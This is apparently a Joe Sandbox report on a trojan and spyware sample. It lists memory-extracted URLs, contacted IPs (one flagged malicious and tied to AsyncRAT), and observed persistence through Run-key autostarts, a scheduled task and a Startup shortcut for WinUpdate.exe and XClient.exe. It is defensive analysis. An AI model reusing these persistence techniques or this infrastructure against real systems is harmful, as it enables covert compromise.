                                                                            https://www.4399.com/flash/776_1.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.4399.com/flash/198637_4.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.4399.com/flash/133630_4.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://sgcs.edge.ker58.commsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://permanently-removed.invalid/RotateBoundCookiesmsedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.4399.com/flash/218717_2.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.4399.com/flash/136516_3.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.4399.com/flash/203215_3.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.4399.com/flash/207195_4.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anglebug.com/3623msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669273335.000030DC00270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://anglebug.com/58810msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://discovery.lenovo.com.cn/home062291msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • 1%, Virustotal, Browse
                                                                                          • Avira URL Cloud: phishing
                                                                                          		unknown
                                                                                          https://hao.360.com/?src=jsqthmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://anglebug.com/3625msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669273335.000030DC00270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://designerapp-int.azurewebsites.net/msedgewebview2.exe, 0000001D.00000002.3693534192.00002DDC00240000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://anglebug.com/3624msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669273335.000030DC00270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://www.whatsapp.com/atorOnPMSequencemsedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://anglebug.com/3862msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://issuetracker.google.com/issues/166475273msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.4399.com/flash/21674_3.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.4399.com/flash/115339_1.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.office.com/wmsedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://internet-start.net/?msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.4399.com/flash/35538.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.4399.com/flash/218066_3.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://web.whatsapp.com/check-update?version=2.2410.1&platform=web?_nc_x=Ij3Wp8lg5Kzmsedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.4399.com/flash/12669_4.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.4399.com/flash/204056_4.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.youtube.com/channel/UCYVg9u9eLx2gQ80OlwoJKYwAhttps://twitter.com/khaldoun_bazOhttps://wwBotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.whatsapp.comAAA0CEDDC5F8DF7DB7FCB9C5C60)msedgewebview2.exe, 0000001D.00000002.3704600886.00002DDC00BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		low
                                                                                                                    https://login.chinacloudapi.cn/msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.so.com/?src=msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://static.whatsapp.net/rsrc.php/v3/yb/l/0msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.whatsapp.com/whatsapp_browser_error_reports/ermsedgewebview2.exe, 00000020.00000002.3655936389.00001B4400284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://anglebug.com/7161msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://www.quad9.net/home/privacy/msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://anglebug.com/7162msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://doh-01.spectrum.com/dns-querymsedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/2517msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://docs.microsoft.cBotMaster.exefalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://anglebug.com/4937msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://login.windows.local/msedgewebview2.exe, 0000001D.00000002.3653662940.0000021F2D6AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://www.sogou.com/web?ie=msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.founder.com.cn/cnBotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • 0%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://developer.mozilla.org/docs/Web/HTTP/Headers/X-Frame-Options)Botmaster 5.8 direct.exe, 00000008.00000003.2196945337.00000000042B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://web.whatsapp.com/apple-touch-icon.pngmsedgewebview2.exe, 0000001D.00000002.3692325076.00002DDC00174000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3710558506.00002DDC010B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.4399.com/flash/155283_1.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.4399.com/flash/seer.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://web.whatsapp.com/temsedgewebview2.exe, 00000020.00000003.2568867078.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://whatsapp.com/static.whatsapp.net/rsrc.php/v3/yr/r/_ElV2y1OxOx.js?_nc_x=Ij3Wp8lg5Kzmsedgewebview2.exe, 0000001D.00000002.3697824582.00002DDC00714000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.whatsapp.com/nOpenerPolicymsedgewebview2.exe, 0000001D.00000002.3705679870.00002DDC00CEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/3832msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://stackoverflow.com/q/2152978/23354SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://permanently-removed.invalid/Logoutmsedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://www.4399.com/flash/73386.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://static.whatsapp.net-msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		low

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  20.25.227.174
                                                                                                                                                  		unknownUnited States
                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                  209.25.140.212
                                                                                                                                                  		title-formula.at.ply.ggCanada
                                                                                                                                                  		13768COGECO-PEER1CAtrue
                                                                                                                                                  204.79.197.239
                                                                                                                                                  		unknownUnited States
                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                  31.13.65.49
                                                                                                                                                  		mmx-ds.cdn.whatsapp.netIreland
                                                                                                                                                  		32934FACEBOOKUSfalse
                                                                                                                                                  173.248.130.117
                                                                                                                                                  		botmaster.mediaplus.meUnited States
                                                                                                                                                  		30475WEHOSTWEBSITES-COMUSfalse
                                                                                                                                                  172.217.18.142
                                                                                                                                                  		unknownUnited States
                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                  172.64.41.3
                                                                                                                                                  		chrome.cloudflare-dns.comUnited States
                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                  Private

                                                                                                                                                  IP
                                                                                                                                                  127.0.0.1

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                  Analysis ID:1406161
                                                                                                                                                  Start date and time:2024-03-10 17:44:06 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 14m 13s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                                                  Number of analysed new started processes analysed:51
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal98.troj.spyw.evad.mine.winEXE@60/380@14/8
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 62.5%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 98%
                                                                                                                                                  • Number of executed functions: 318
                                                                                                                                                  • Number of non-executed functions: 115
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                  Warnings

                                                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.42.16, 23.202.57.177, 20.88.206.205, 72.21.81.200, 142.251.2.94
                                                                                                                                                  • Excluded domains from analysis (whitelisted): wildcardtlu.azureedge.net, nav-edge.smartscreen.microsoft.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, tm-prod-wd-csp-edge.trafficmanager.net, ocsp.digicert.com, prod-agic-scu-2.southcentralus.cloudapp.azure.com, cdp-tlu-shim.trafficmanager.net, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, wildcardtlu.ec.azureedge.net, config.edge.skype.com, cs9.wpc.v0cdn.net
                                                                                                                                                  • Execution Graph export aborted for target WinUpdate.exe, PID 7632 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target XClient.exe, PID 2640 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target XClient.exe, PID 8020 because it is empty
                                                                                                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  16:45:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinUpdate C:\Users\user\AppData\Local\WinUpdate.exe
                                                                                                                                                  16:45:41Task SchedulerRun new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                  16:45:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                  16:45:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinUpdate C:\Users\user\AppData\Local\WinUpdate.exe
                                                                                                                                                  16:46:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                  16:46:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                                                                                                                                                  17:46:13API Interceptor1650468x Sleep call for process: aspnet_compiler.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  20.25.227.174edge_x86_KB91412024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    https://stackauth-bainlk.cz/save/sharefile/Get hashmaliciousUnknownBrowse
                                                                                                                                                      209.25.140.212MH8owDK88S.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                        204.79.197.239http://213.109.202.222/download/xml.xmlGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.21155.29709.exeGet hashmaliciousAmadey, RisePro StealerBrowse
